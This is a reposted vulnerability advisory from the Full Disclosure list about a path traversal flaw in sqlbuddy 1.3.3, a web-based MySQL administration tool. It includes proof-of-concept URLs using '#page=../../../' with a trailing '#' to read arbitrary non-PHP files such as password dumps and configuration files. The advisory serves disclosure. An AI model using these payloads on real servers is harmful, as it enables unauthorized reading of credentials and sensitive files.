HackDig : Dig high-quality web security articles for hacker

Sqlbuddy Path Traversal Vulnerability

2015-05-10 09:10
Read arbitrary server files:

Affected Vendor:
www.sqlbuddy.com

Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt

Product:
sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL
administration application.

Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploits:
=======================

1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo


Disclosure Timeline:
==================================

Vendor Notification N/A
May 9, 2015: Public Disclosure - hyp3rlinx


Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
===============
High


Description:
==========================

Request Method(s):
[+] POST

Vulnerable Product:
[+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
[+] #page=[somefile]

Affected Area(s):
[+] Server directories & sensitive files

===============================

(hyp3rlinx)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Source: 34/yaM/5102/erusolcsidlluf/gro.stsilces

Read:1871 | Comments:0 | Tags: Vulnerability

“Sqlbuddy Path Traversal Vulnerability”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud